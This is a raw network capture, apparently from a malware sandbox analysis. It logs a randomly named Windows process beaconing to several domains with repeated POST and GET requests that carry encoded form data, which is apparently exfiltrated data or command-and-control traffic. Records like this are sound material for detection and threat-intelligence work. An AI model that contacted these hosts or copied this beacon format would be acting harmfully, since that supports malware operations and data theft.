                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
Oct 23, 2024 18:55:39.987567902 CEST  390                IN         HTTP/1.1 200 OK
                                                                                                                                                                                                                        Server: openresty
                                                                                                                                                                                                                        Date: Wed, 23 Oct 2024 16:55:39 GMT
                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                        Content-Length: 250
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?Hh=g6BlO&2rul-=4uIsvpMyaiNaEMynSWraJ/2ewRneyY2IM3xoEszCiepO+vQwtMzBLq4BvMD3ENezA07qcacnmpI/gT8KQ+99hp5F4iXZ7molM84vqZhw689aaRZynnXQiFE="}</script></head></html>


Session ID  Source IP      Source Port  Destination IP  Destination Port  PID   Process
33          192.168.11.20  49825        84.32.84.32     80                5492  C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exe

Timestamp                             Bytes transferred  Direction  Data
Oct 23, 2024 18:55:45.452406883 CEST  805                OUT        POST /yzuf/ HTTP/1.1
                                                                                                                                                                                                                        Host: www.xtelify.tech
                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Origin: http://www.xtelify.tech
                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Content-Length: 202
                                                                                                                                                                                                                        Referer: http://www.xtelify.tech/yzuf/
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
                                                                                                                                                                                                                        Data Ascii: 2rul-=UuIjE9tfJQrkparRTlZurKQqfF48NMZfYJqOBb3gZCqhkG1Fq4balZgnFo0YhurEbYeSOgYNtF53ryS/61lNxqWroMY2iIxQB8Kh4q0ARF+LFsiyXWHfJKK3zapf+X/Y19Cc7MhjGtn1+nnKdo3uCZ6N9nZuEe/auOh6Ppn4zwUK6z0/XM/BlqRlI7+CkTfOcA==


Session ID  Source IP      Source Port  Destination IP  Destination Port  PID   Process
34          192.168.11.20  49826        84.32.84.32     80                5492  C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exe

Timestamp                             Bytes transferred  Direction  Data
Oct 23, 2024 18:55:48.301084042 CEST  825                OUT        POST /yzuf/ HTTP/1.1
                                                                                                                                                                                                                        Host: www.xtelify.tech
                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Origin: http://www.xtelify.tech
                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Content-Length: 222
                                                                                                                                                                                                                        Referer: http://www.xtelify.tech/yzuf/
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
                                                                                                                                                                                                                        Data Ascii: 2rul-=UuIjE9tfJQrko5zRRCNujKQpQl48HsYYYJmOBazwZwehlnFFr6/aiZgnd40R8+rxbYasOgUNtFF3rzi/7CxOx6WpksYomIxQB8Kh4qhlRFmLGf6yFnHcW6Ko76pfvH/c19Cy7OVdGrr1+n3Kd53vMZ6P5nYKMNGOqKRREL/C8lou/l5lK+Llm5NXMLHqmReVBF+ve3Q09ZO6+45x5UhBXBg=


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
35 | 192.168.11.20 | 49827 | 84.32.84.32 | 80 | 5492 | C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exe
Timestamp | Bytes transferred | Direction | Data
Oct 23, 2024 18:55:51.146141052 CEST | 2578 | OUT | POST /yzuf/ HTTP/1.1
                                                                                                                                                                                                                        Host: www.xtelify.tech
                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Origin: http://www.xtelify.tech
                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Content-Length: 7370
                                                                                                                                                                                                                        Referer: http://www.xtelify.tech/yzuf/
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
36 | 192.168.11.20 | 49828 | 84.32.84.32 | 80 | 5492 | C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exe
Timestamp | Bytes transferred | Direction | Data
Oct 23, 2024 18:55:53.986085892 CEST | 534 | OUT | GET /yzuf/?2rul-=ZsgDHK4yKF/kga3ubUsB++F7bk5VbtpSdK+jBdrvfSumqltPqrTYlvpJAqwvk8XGFPq2CREtnxkO8zvg3UxP0eeY1d9UqJAwYt3G0ZBcRQKWReWSPWriOKM=&Hh=g6BlO HTTP/1.1
                                                                                                                                                                                                                        Host: www.xtelify.tech
                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
Oct 23, 2024 18:55:54.297432899 CEST | 1289 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                        Server: hcdn
                                                                                                                                                                                                                        Date: Wed, 23 Oct 2024 16:55:42 GMT
                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                        Content-Length: 10072
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                        x-hcdn-request-id: bbfa37000c4d5fd9c0a80ca9062baaca-jnb-edge2
                                                                                                                                                                                                                        Expires: Wed, 23 Oct 2024 16:55:41 GMT
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                        Data Ascii: <!doctype html><title>Parked Domain name on Hostinger DNS system</title><meta charset=utf-8><meta content="IE=edge,chrome=1" http-equiv=X-UA-Compatible><meta content="Parked Domain name on Hostinger DNS system" name=description><meta content="width=device-width,initial-scale=1" name=viewport><link href=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css rel=stylesheet><script src=https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js></script><script src=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js></script><link href=https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css rel=stylesheet><link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i&subset=cyrillic,cyrillic-ext,greek,greek-ext,latin-ext,vietnamese" rel=stylesheet><style>html{height:100%}body{font-family:"Open Sans",Helvetica,sans-serif;color:#000;padding:0;


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
37 | 192.168.11.20 | 49829 | 75.2.19.62 | 80 | 5492 | C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exe
Timestamp | Bytes transferred | Direction | Data
Oct 23, 2024 18:55:59.659310102 CEST | 829 | OUT | POST /ygv5/ HTTP/1.1
                                                                                                                                                                                                                        Host: www.bigliaserramenti.com
                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Origin: http://www.bigliaserramenti.com
                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Content-Length: 202
                                                                                                                                                                                                                        Referer: http://www.bigliaserramenti.com/ygv5/
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
                                                                                                                                                                                                                        Data Ascii: 2rul-=vV0VV0lNTLK3vQ755w9uoFbFEMT+UVk49AauZ0LdjexbrTPunmBGr1rH8bd8PSoAZu8DAv3OvRVLWeQoCkEXXLmMltH4aQbj7e6Jn2DMyzMXbxoVk7epOjlhPJnLHU628GmA+cxZoz5Ec7I1LQZd1fDM6vPoPiumwMgSr+rCrJbESabkNtX0x6wnKfle3XK/5A==


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
38 | 192.168.11.20 | 49830 | 75.2.19.62 | 80 | 5492 | C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exe
Timestamp | Bytes transferred | Direction | Data
Oct 23, 2024 18:56:02.284226894 CEST | 849 | OUT | POST /ygv5/ HTTP/1.1
                                                                                                                                                                                                                        Host: www.bigliaserramenti.com
                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Origin: http://www.bigliaserramenti.com
                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Content-Length: 222
                                                                                                                                                                                                                        Referer: http://www.bigliaserramenti.com/ygv5/
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
                                                                                                                                                                                                                        Data Ascii: 2rul-=vV0VV0lNTLK3uxr523pu5lbKdsT+f1k89AmuZ2mYjMlbqy/uhXBGo1rHz7c2QipMZuALAr3OvRpLWaAoDTQUXbmC+dH6Xwbj7e6Jn2XmyzUXcAYVkaeuDDliCZnLN07e8Gnl+dtjoxREc5Q1LBZe7vCH0PO4G2jrx8oW7MbZyIjsTMW+QfjQypsVOvc21VLkkKRIooGV0VOzobjLmjm2WeQ=


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
39 | 192.168.11.20 | 49831 | 75.2.19.62 | 80 | 5492 | C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exe
Timestamp | Bytes transferred | Direction | Data
Oct 23, 2024 18:56:04.911489964 CEST | 1289 | OUT | POST /ygv5/ HTTP/1.1
                                                                                                                                                                                                                        Host: www.bigliaserramenti.com
                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Origin: http://www.bigliaserramenti.com
                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Content-Length: 7370
                                                                                                                                                                                                                        Referer: http://www.bigliaserramenti.com/ygv5/
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
Oct 23, 2024 18:56:04.911542892 CEST | 3867 | OUT
                                                                                                                                                                                                                        Data Ascii: Yq8yECiChRA5vkYmrnE4dEkc6/FkwiUDW/Ft/P8b6rJ5+fVAAbUc/aHP35xOxdIg4t/mjRrI9l6LdCc6agJiKp+pivdeoyiKSkA7SZkOZwECcAKHsjbpfa9GPZIdEOHCmhP+gUDiwWjRyFYMvG1lIxx4Jzkkgb05PkW3xJUXSZ3oBlK6llDydHvRF7mRYAzVL5xL+BuYGkrAiKMoQzDOFJEqLspQIx8xApcvwU1dyzReF+B8tY7
Oct 23, 2024 18:56:04.911597013 CEST | 2842 | OUT
                                                                                                                                                                                                                        Data Ascii: BAYxFhboRLbUT9+Ojgki0/tBYGnpGKatO1KWfl7HsPDkpzThyI88VX6F/ZyJezkKe8m06uwAdjx+tq9txRXeszBd8GEDYAHxN3yW4divtOhZW+aLCR1XPDN2jTNcmRqQyJT4r8V7n8KKfzxcbwizfvU7csx2mYlZTfWFaI/P/BbuTr2501UYxuWj4Hv7lPcPoYHQ942q15ePrRPUar9czaLySEMiQpYwCj/kW7WkMB8P4kFWVDc


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
40 | 192.168.11.20 | 49832 | 75.2.19.62 | 80 | 5492 | C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exe
Timestamp | Bytes transferred | Direction | Data
Oct 23, 2024 18:56:07.535723925 CEST | 542 | OUT | GET /ygv5/?Hh=g6BlO&2rul-=iXc1WEJQd/Gahx7+3W11/RKNDsT+DV4H4y6OEj3K8d5Enxayz0VfmTOd+atgJRAuX8UuGK7zkF0xfNQrHCEKQuis9q2uRBiLjPiUjFzh2kkhFDo8hKapbBo= HTTP/1.1
                                                                                                                                                                                                                        Host: www.bigliaserramenti.com
                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
Oct 23, 2024 18:56:07.689454079 CEST | 390 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                        Server: openresty
                                                                                                                                                                                                                        Date: Wed, 23 Oct 2024 16:56:07 GMT
                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                        Content-Length: 250
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?Hh=g6BlO&2rul-=iXc1WEJQd/Gahx7+3W11/RKNDsT+DV4H4y6OEj3K8d5Enxayz0VfmTOd+atgJRAuX8UuGK7zkF0xfNQrHCEKQuis9q2uRBiLjPiUjFzh2kkhFDo8hKapbBo="}</script></head></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
41 | 192.168.11.20 | 49833 | 172.67.177.220 | 80 | 5492 | C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exe
Timestamp | Bytes transferred | Direction | Data
Oct 23, 2024 18:56:12.907430887 CEST | 820 | OUT | POST /wjz2/ HTTP/1.1
                                                                                                                                                                                                                        Host: www.theawareness.shop
                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Origin: http://www.theawareness.shop
                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Content-Length: 202
                                                                                                                                                                                                                        Referer: http://www.theawareness.shop/wjz2/
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
                                                                                                                                                                                                                        Data Ascii: 2rul-=UcWnqaZ55PeQzIsK6qnqcnp09K6mp+s2w/0KpjtlTpjkqBNLLekO1oIWP5LjAaGdAreIfU9IwZ8OSglbPm8puRMSETlFyQXto5rbRUXYqEg41spXH3lWoDw1ujAwbA+8QPNu+RfPN2u6mnphTsBX9g5UFeBZBoYAIirrjuCkAEjLXomgnMLw5oIEIJygbNfo0Q==
Oct 23, 2024 18:56:13.194932938 CEST | 1289 | IN | HTTP/1.1 502 Bad Gateway
                                                                                                                                                                                                                        Date: Wed, 23 Oct 2024 16:56:13 GMT
                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                        Content-Length: 6366
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0QyS5xAQHynTOM8A4bCxq0rDAAFvi%2B%2FqNC7Ds7L6%2BdZYX0WkuMrZrjaoJ6wzQyZOltdwyiT50Xw4poQaYdnDByTeUA4ojWMIuWnbuFNTAQi8u5yoHEEYYNrWB7VRvZTpSsJf2Iarmx8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                        Referrer-Policy: same-origin
                                                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                        CF-RAY: 8d734258f9ec43b6-EWR
                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=94974&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=820&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                                        Data Ascii: <!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>www.theawareness.shop |
Oct 23, 2024 18:56:13.194988966 CEST | 1289 | IN
                                                                                                                                                                                                                        Data Ascii: 502: Bad gateway</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="vie
Oct 23, 2024 18:56:13.195142031 CEST | 1289 | IN
                                                                                                                                                                                                                        Data Ascii: div id="cf-browser-status" class=" relative w-1/3 md:w-full py-15 md:p-0 md:py-8 md:text-left md:border-solid md:border-0 md:border-b md:border-gray-400 overflow-hidden float-left md:float-none text-center"> <div class="relative mb-10 md:m-0
Oct 23, 2024 18:56:13.195286036 CEST | 1289 | IN
                                                                                                                                                                                                                        Data Ascii: -0 md:top-0 -ml-6 -bottom-4"></span> </a> </div> <span class="md:block w-full truncate">Newark</span> <h3 class="md:inline-block mt-3 md:mt-0 text-2xl text-gray-600 font-light leading-1.3"> <a href="https://www.cloudflare.com/5xx
Oct 23, 2024 18:56:13.195380926 CEST | 1289 | IN
                                                                                                                                                                                                                        Data Ascii: ="w-240 lg:w-full mx-auto mb-8 lg:px-8"> <div class="clearfix"> <div class="w-1/2 md:w-full float-left pr-6 md:pb-10 md:pr-0 leading-relaxed"> <h2 class="text-3xl font-normal leading-1.3 mb-4">Wh
                                                                                                                                                                                                                        Oct 23, 2024 18:56:13.195493937 CEST856INData Raw: 2e 31 36 2e 31 39 32 2e 32 32 35 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e
                                                                                                                                                                                                                        Data Ascii: .16.192.225</span> <span class="cf-footer-separator sm:hidden">&bull;</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance &amp; security by</span> <a rel="noopener noreferrer" href="https://www.cloudfla


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
42 | 192.168.11.20 | 49834 | 172.67.177.220 | 80 | 5492 | C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exe
Timestamp | Bytes transferred | Direction | Data
Oct 23, 2024 18:56:15.531770945 CEST | 840 | OUT | POST /wjz2/ HTTP/1.1
                                                                                                                                                                                                                        Host: www.theawareness.shop
                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Origin: http://www.theawareness.shop
                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Content-Length: 222
                                                                                                                                                                                                                        Referer: http://www.theawareness.shop/wjz2/
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
                                                                                                                                                                                                                        Data Ascii: 2rul-=UcWnqaZ55PeQyo8K4NTqaHp12q6m7+t/w/IKpmNPSbXkqg9LIa4O2oIWHZLiY6HwArSufWpIwZ4OSlZbPRguuBMMIzlH2QXto5rbRQ/iqE440YVXHWlV2Tw2pjAwfA/1QPN2+QD1Nwy6mj5hT9BUkw5SBeAwMNFaQmLCl5qYIhrJS+r66+/U67U2M5LIZPezpaU5Lc3WHKe013k7YP17dUY=
Oct 23, 2024 18:56:15.820482016 CEST | 1289 | IN | HTTP/1.1 502 Bad Gateway
                                                                                                                                                                                                                        Date: Wed, 23 Oct 2024 16:56:15 GMT
                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                        Content-Length: 6366
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=64TZ0ptVMBX8llmObBoHEa3pndw0Dqf4m5uHTAAb%2FKHAvFgpjp%2FOWDN6Op9d9g3fZCPurBPMfMsyPrO3IblRwD5VqHDlTZgPXu%2FdP5b2TuVCgTLTytDCWJG3Q8o4C1VjQ%2B3zHVhi1%2BU%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                        Referrer-Policy: same-origin
                                                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                        CF-RAY: 8d73426969b142df-EWR
                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=94634&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=840&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
43 | 192.168.11.20 | 49835 | 172.67.177.220 | 80 | 5492 | C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exe
Timestamp | Bytes transferred | Direction | Data
Oct 23, 2024 18:56:18.156327009 CEST | 1289 | OUT | POST /wjz2/ HTTP/1.1
                                                                                                                                                                                                                        Host: www.theawareness.shop
                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Origin: http://www.theawareness.shop
                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Content-Length: 7370
                                                                                                                                                                                                                        Referer: http://www.theawareness.shop/wjz2/
                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
Oct 23, 2024 18:56:18.429986000 CEST | 1289 | IN | HTTP/1.1 502 Bad Gateway
                                                                                                                                                                                                                        Date: Wed, 23 Oct 2024 16:56:18 GMT
                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                        Content-Length: 6366
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8ps45tChglZ2u9xbRerdTi1NQrjSKwz3bqrrUpbVQUAxf4%2FMqaVmx8iN9iImuG1ZzSN9oEseRbc%2BWIZo7p7jePbdNmADu3w5dvddjak5ax5tU%2Fh5MXfgF6n8ToEjEuxPmjaFq4uR16Q%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                        Referrer-Policy: same-origin
                                                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                        CF-RAY: 8d734279cce278d0-EWR
                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=94603&sent=7&recv=9&lost=0&retrans=0&sent_bytes=0&recv_bytes=7989&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
44 | 192.168.11.20 | 49836 | 172.67.177.220 | 80 | 5492 | C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exe
